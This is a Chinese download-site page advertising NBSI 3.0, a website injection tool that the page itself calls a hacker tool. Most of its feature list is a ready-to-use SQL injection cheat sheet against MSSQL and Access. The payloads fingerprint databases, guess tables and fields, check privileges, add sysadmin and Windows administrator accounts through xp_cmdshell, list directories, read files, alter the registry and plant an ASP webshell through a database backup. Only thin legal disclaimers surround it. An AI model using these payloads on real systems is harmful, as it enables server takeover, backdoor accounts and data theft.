河东软件园:绿色免费的软件下载站! 最新软件|软件分类|软件专题|软件发布

所在位置:首页 > 网络软件 > 网络监测 > nbsi网站漏洞检测工具(nbsi3.0) hack520 专用版

nbsi网站漏洞检测工具(nbsi3.0)

 hack520 专用版
  • 软件大小:4.02 MB
  • 更新日期:2016-11-15
  • 软件语言:简体中文
  • 软件类别:网络监测
  • 软件授权:免费软件
  • 软件官网:
  • 适用平台:WinXP, Win7, Win8, Win10, WinAll
  • 软件厂商:

8.9
软件评分

本地下载文件大小:4.02 MB 高速下载需下载高速下载器,提速50%

软件介绍人气软件相关文章网友评论下载地址

为您推荐:网络监测

  nbsi网站漏洞检测工具(nbsi3.0)是一款功能非常强大的安全检测工具;它包括了注入分析、网站扫描、getwebshell、扫描、工具等栏目,并且可以支持进行PHP、ASP的网站漏洞的安全检测,使自己的服务器不被工具,可更好的保护自己;软件的操作简单,使用方便,界面清晰,完全免费,需要的朋友赶快将nbsi网站漏洞检测工具(nbsi3.0)下载来使用试试吧,如果使用软件进行非法的行为,一切的后果本站概不负责!

nbsi网站漏洞检测工具(nbsi3.0) hack520 专用版

软件功能

  1.判断是否有注入

  ;and 1=1

  ;and 1=2

  2.初步判断是否是mssql

  ;and user>0

  3.判断数据库系统

  ;and (select count(*) from sysobjects)>0 mssql

  ;and (select count(*) from msysobjects)>0 access

  4.注入参数是字符

  'and [查询条件] and ''='

  5.搜索时没过滤参数的

  'and [查询条件] and '%25'='

  6.猜数据库

  ;and (Select Count(*) from [数据库名])>0

  7.猜字段

  ;and (Select Count(字段名) from 数据库名)>0

  8.猜字段中记录长度

  ;and (select top 1 len(字段名) from 数据库名)>0

  9.(1)猜字段的ascii值(access)

  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

  (2)猜字段的ascii值(mssql)

  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

  10.测试权限结构(mssql)

  ;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--

  ;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--

  ;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--

  ;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--

  ;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--

  ;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--

  ;and 1=(SELECT IS_MEMBER('db_owner'));--

  11.添加mssql和系统的帐户

  ;exec master.dbo.sp_addlogin username;--

  ;exec master.dbo.sp_password null,

  username,password;--

  ;exec master.dbo.sp_addsrvrolemember sysadmin

  username;--

  ;exec master.dbo.xp_cmdshell 'net user username

  password /workstations:* /times:all

  /passwordchg:yes /passwordreq:yes /active:yes /add'

  ;--

  ;exec master.dbo.xp_cmdshell 'net user username

  password /add';--

  ;exec master.dbo.xp_cmdshell 'net localgroup

  administrators username /add';--

  12.(1)遍历目录

  ;create table dirs(paths varchar(100), id int)

  ;insert dirs exec master.dbo.xp_dirtree 'c:'

  ;and (select top 1 paths from dirs)>0

  ;and (select top 1 paths from dirs where paths not

  in('上步得到的paths'))>)

  (2)遍历目录

  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 获得子目录列表

  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- 获得所有子目录的目录树结构

  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- 查看文件的内容

  13.mssql中的存储过程

  xp_regenumvalues 注册表根键, 子键

  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',

  'SOFTWAREmicrosoftWindowsCurrentVersionRun' 以多个记录集方式返回所有键值

  xp_regread 根键,子键,键值名

  ;exec xp_regread 'HKEY_LOCAL_MACHINE',

  'SOFTWAREMicrosoftWindowsCurrentVersion',

  'CommonFilesDir' 返回制定键的值

  xp_regwrite 根键,子键, 值名, 值类型, 值

  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型

  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE',

  'SOFTWAREMicrosoftWindowsCurrentVersion',

  'TestValueName','reg_sz','hello' 写入注册表

  xp_regdeletevalue 根键,子键,值名

  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',

  'SOFTWAREMicrosoftWindowsCurrentVersion',

  'TestValueName' 删除某个值

  xp_regdeletekey 'HKEY_LOCAL_MACHINE',

  'SOFTWAREMicrosoftWindowsCurrentVersionTestkey' 删除键,包括该键下所有值

  14.mssql的backup创建webshell

  use model

  create table cmd(str image);

  insert into cmd(str) values ('');

  backup database model to disk='c:l.asp';

  15.mssql内置函数

  ;and (select @@version)>0 获得Windows的版本号

  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa

  ;and (select user_name())>0 爆当前系统的连接用户

  ;and (select db_name())>0 得到当前连接的数据库

  16.简洁的webshell

  use model

  create table cmd(str image);

  insert into cmd(str) values ('');

  backup database model to disk='g:wwwtestl.asp';

  请求的时候,像这样子用:

  http://ip/l.asp?c=dir

软件特色

  本工具功能非常强大,希望同学们用于正途

  别去做一些偷鸡摸狗的令人可耻的事情

  由VB语言编写的网站漏洞检测工具的名称

  ASP注入漏洞检测工具

  特别在SQL Server注入检测方面有极高的准确率

使用方法

  1、下载文件找到"SWebVulnsScan.exe"双击运行,进入软件;

  2、进入软件,出现下图界面,如下图;

nbsi网站漏洞检测工具(nbsi3.0) hack520 专用版

  3、系统设置包括了开始域名、域名的总数、日志等;

nbsi网站漏洞检测工具(nbsi3.0) hack520 专用版

  4、CMS识别包括了配置、导入域名、导入、当前识别、识别的结果、CMS程序等;

nbsi网站漏洞检测工具(nbsi3.0) hack520 专用版

  5、漏洞扫描包括了导入域名、域名总数、通用的CMS漏洞、通用组件漏洞等;

nbsi网站漏洞检测工具(nbsi3.0) hack520 专用版

  6、目录扫描包括了域名,导入、指纹识别、急速扫描、精确扫描等;

nbsi网站漏洞检测工具(nbsi3.0) hack520 专用版

更新日志

  修复http发包API错误问题

  优化字典,删了10万无用字典

  显示状态可是设置提示那些状态码或者不提示那些状态码

  这个是黑客工具,来自NB官方!只能用于安全检测,非法入侵他人网站必将受到法律严惩。

下载地址

  • nbsi网站漏洞检测工具(nbsi3.0) hack520 专用版

    本地高速下载

人气软件

查看所有评论>>网友评论0

发表评论

您的评论需要经过审核才能显示

精彩评论

最新评论

盖楼回复X

(您的评论需要经过审核才能显示)